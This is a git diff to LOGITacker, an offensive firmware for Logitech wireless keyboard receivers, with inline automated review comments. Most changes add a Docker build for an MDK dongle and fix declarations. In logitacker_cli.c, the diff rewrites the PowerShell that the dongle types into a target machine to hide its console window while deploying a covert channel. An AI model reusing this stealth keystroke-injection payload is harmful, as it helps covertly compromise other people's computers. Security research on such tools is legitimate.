diff --git a/Dockerfile.mdk-dongle b/Dockerfile.mdk-dongle
new file mode 100644
index 0000000..9991411
--- /dev/null
+++ b/Dockerfile.mdk-dongle
@@ -0,0 +1,31 @@
+# Dockerfile.mdk-dongle
+
+FROM kalilinux/kali-rolling
+
+WORKDIR /root
+
+# Install toolchain and dependencies
+RUN apt-get update && apt-get -y install wget git gcc-arm-none-eabi unzip sed make python3
+
+# Fetch nRF5 SDK and LOGITacker repo
+RUN wget https://www.nordicsemi.com/-/media/Software-and-other-downloads/SDKs/nRF5/Binaries/nRF5SDK153059ac345.zip \
+ && unzip nRF5SDK153059ac345.zip \
+ && git clone https://github.com/LuemmelSec/LOGITacker
+
+# Patch SDK for local toolchain
+RUN sed -i "s#^GNU_INSTALL_ROOT.*#GNU_INSTALL_ROOT ?= /usr/bin/#g" \
+ nRF5_SDK_15.3.0_59ac345/components/toolchain/gcc/Makefile.posix
+
+# Build only the MakerDiary MDK Dongle target
+WORKDIR /root/LOGITacker/mdk-dongle/blank/armgcc
+RUN sed -i "s#^SDK_ROOT.*#SDK_ROOT := /root/nRF5_SDK_15.3.0_59ac345#g" Makefile && make
+
+# Fetch UF2 conversion script
+WORKDIR /root
+RUN wget https://raw.githubusercontent.com/microsoft/uf2/master/utils/uf2conv.py \
+ && wget https://raw.githubusercontent.com/microsoft/uf2/master/utils/uf2families.json
+
+# Create build dir and convert HEX to UF2
+RUN mkdir build \
+ && cp LOGITacker/mdk-dongle/blank/armgcc/_build/logitacker_mdk_dongle.hex build \
+ && python3 uf2conv.py build/logitacker_mdk_dongle.hex -c -f 0xADA52840 -o build/logitacker_mdk_dongle.uf2
diff --git a/build_mdk_dongle_firmware.sh b/build_mdk_dongle_firmware.sh
new file mode 100644
index 0000000..899c8b4
--- /dev/null
+++ b/build_mdk_dongle_firmware.sh
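Review bot: In Dockerfile.mdk-dongle the firmware is built from a fresh `git clone https://github.com/LuemmelSec/LOGITacker` rather than from the build context that build_mdk_dongle_firmware.sh passes as `.`, so the source changes in this same commit are only built once they reach the remote default branch, and two builds of the same checkout can differ. Assuming this repository is the LOGITacker tree, `COPY . /root/LOGITacker` would build exactly what was reviewed. The SDK zip, `uf2conv.py` and `uf2families.json` are fetched with `wget` and used without any integrity check, and the latter two track `master`; pin them to a commit and verify a recorded digest before use, e.g. `echo "<EXPECTED_SHA256>  nRF5SDK153059ac345.zip" | sha256sum -c -`. The `kali-rolling` base tag is mutable as well and could be pinned by digest.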
@@ -0,0 +1,16 @@
+#!/bin/bash
+
+IMAGE_NAME="logitacker-mdk"
+CONTAINER_NAME="logitacker-mdk-container"
+OUTPUT_DIR="$(pwd)/build"
+
+# Build Docker image
+docker build -f Dockerfile.mdk-dongle -t $IMAGE_NAME .
+
+# Create a container and copy the firmware out
+docker create --name $CONTAINER_NAME $IMAGE_NAME
+mkdir -p "$OUTPUT_DIR"
+docker cp $CONTAINER_NAME:/root/build "$OUTPUT_DIR"
+docker rm $CONTAINER_NAME
+
+echo "UF2 file located at: $OUTPUT_DIR/build/logitacker_mdk_dongle.uf2"
diff --git a/logitacker/logitacker.c b/logitacker/logitacker.c
index dc75508..4d8472c 100644
--- a/logitacker/logitacker.c
+++ b/logitacker/logitacker.c
@@ -31,6 +31,7 @@
 #include "nrf_log.h"
 #include "logitacker_processor_covert_channel.h"
+char g_logitacker_cli_name[32];
 NRF_LOG_MODULE_REGISTER();
 APP_TIMER_DEF(m_timer_next_tx_action);
diff --git a/logitacker/logitacker.h b/logitacker/logitacker.h
index 3af2dfd..e2e6980 100644
--- a/logitacker/logitacker.h
+++ b/logitacker/logitacker.h
@@ -47,7 +47,7 @@ typedef enum {
 LOGITACKER_MODE_IDLE
 } logitacker_mode_t;
-char g_logitacker_cli_name[32];
+extern char g_logitacker_cli_name[32];
 uint32_t logitacker_init();
@@ -80,4 +80,4 @@ uint32_t logitacker_covert_channel_push_data(covert_channel_payload_data_t const
-#endif
\ No newline at end of file
+#endif
diff --git a/logitacker/logitacker_cli.c b/logitacker/logitacker_cli.c
index 342c09e..3d93248 100644
--- a/logitacker/logitacker_cli.c
+++ b/logitacker/logitacker_cli.c
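Review bot: build_mdk_dongle_firmware.sh has no error handling, so a failed `docker build` still falls through to `docker create` and `docker cp` against whatever `logitacker-mdk` image already exists locally, and the script then prints the success line for a stale or missing artifact. Add `set -euo pipefail` directly after the shebang. Because the container name is fixed, a leftover `logitacker-mdk-container` from an interrupted run makes `docker create` fail; registering `trap 'docker rm -f "$CONTAINER_NAME" >/dev/null 2>&1' EXIT` before the create step cleans up on every exit path. `$IMAGE_NAME` and `$CONTAINER_NAME` should also be quoted where they are expanded, as `"$OUTPUT_DIR"` already is.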
@@ -49,9 +49,9 @@ void deploy_covert_channel_script(bool hide) {
 logitacker_script_engine_append_task_delay(2000);
 if (hide) {
- logitacker_script_engine_append_task_type_string("$h=(Get-Process -Id $pid).MainWindowHandle;$ios=[Runtime.InteropServices.HandleRef];$hw=New-Object $ios (1,$h);");
- logitacker_script_engine_append_task_type_string("$i=New-Object $ios(2,0);(([reflection.assembly]::LoadWithPartialName(\"WindowsBase\")).GetType(\"MS.Win32.UnsafeNativeMethods\"))::SetWindowPos($hw,$i,0,0,100,100,16512)\n");
- logitacker_script_engine_append_task_delay(500);
+ logitacker_script_engine_append_task_type_string("Add-Type -Namespace Win32 -Name Api -MemberDefinition '[DllImport(\"kernel32.dll\")] public static extern IntPtr GetConsoleWindow();");
+ logitacker_script_engine_append_task_type_string("[DllImport(\"user32.dll\")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);'; $h = [Win32.Api]::GetConsoleWindow(); [Win32.Api]::ShowWindow($h, 0);");
+ logitacker_script_engine_append_task_delay(500);
 }
 while (strlen(agentscript) >= 128) {
diff --git a/logitacker/logitacker_processor_covert_channel.c b/logitacker/logitacker_processor_covert_channel.c
index e0c5f7e..64c1a72 100644
--- a/logitacker/logitacker_processor_covert_channel.c
+++ b/logitacker/logitacker_processor_covert_channel.c
@@ -526,7 +526,7 @@ void processor_covert_channel_esb_handler_func_(logitacker_processor_covert_chan
 switch (p_esb_event->evt_id) {
 case NRF_ESB_EVENT_TX_FAILED:
- NRF_LOG_INFO("COVERT CHANNEL TX_FAIL ... re-transmit");
+ // NRF_LOG_INFO("COVERT CHANNEL TX_FAIL ... re-transmit");
 // retransmit
 nrf_esb_start_tx();
 break;
@@ -588,4 +588,4 @@ logitacker_processor_t * new_processor_covert_channel(uint8_t *rf_address, app_t
 return contruct_processor_covert_channel_instance(&m_static_covert_channel_ctx);
-}
\ No newline at end of file
+}
diff --git a/logitacker/logitacker_usb.c b/logitacker/logitacker_usb.c
index d5291de..b46c0b8 100644
--- a/logitacker/logitacker_usb.c
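Review bot: In logitacker_cli.c the two typed strings in the `if (hide)` branch form one PowerShell statement whose single-quoted `-MemberDefinition` argument opens in the first call and closes in the second, and nothing in the code records that coupling. A comment above them would keep a later edit from breaking the pairing and would name the magic value, for example `/* hide: one Add-Type statement split across two type_string tasks; declares GetConsoleWindow/ShowWindow, then ShowWindow(h, 0) where 0 is SW_HIDE */`. The `logitacker_script_engine_append_task_delay(500);` line is removed and re-added with identical text, so only its leading whitespace changed; confirm the new indentation matches the tabs-or-spaces convention of the surrounding lines. deploy_covert_channel_script starts and continues outside this hunk.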
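Review bot: In logitacker_processor_covert_channel.c the `NRF_ESB_EVENT_TX_FAILED` case now carries a commented-out `NRF_LOG_INFO` call, which leaves dead code in the handler and drops the only trace of failed transmissions. If the aim is to stop log flooding during retransmits, either delete the line or demote it, e.g. `NRF_LOG_DEBUG("COVERT CHANNEL TX_FAIL ... re-transmit");`, so it can be re-enabled through the module log level. The context lines also show `nrf_esb_start_tx()` called with its return value ignored and no retry bound visible in the hunk; that predates this commit, but with the message silenced a persistent failure would repeat without leaving any record. The handler's body starts and ends outside the hunk.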
+++ b/logitacker/logitacker_usb.c @@ -14,7 +14,6 @@ #include "logitacker_script_engine.h" #include "logitacker_options.h" - NRF_LOG_MODULE_REGISTER(); uint8_t tmp_in_rep_buf[4][LOGITACKER_USB_HID_GENERIC_IN_REPORT_MAXSIZE]; diff --git a/logitacker/logitacker_usb.h b/logitacker/logitacker_usb.h index 52f33b4..9f67279 100644 --- a/logitacker/logitacker_usb.h +++ b/logitacker/logitacker_usb.h @@ -166,7 +166,7 @@ typedef enum { } -const app_usbd_hid_generic_t m_app_hid_generic; +extern const app_usbd_hid_generic_t m_app_hid_generic; // User event handler.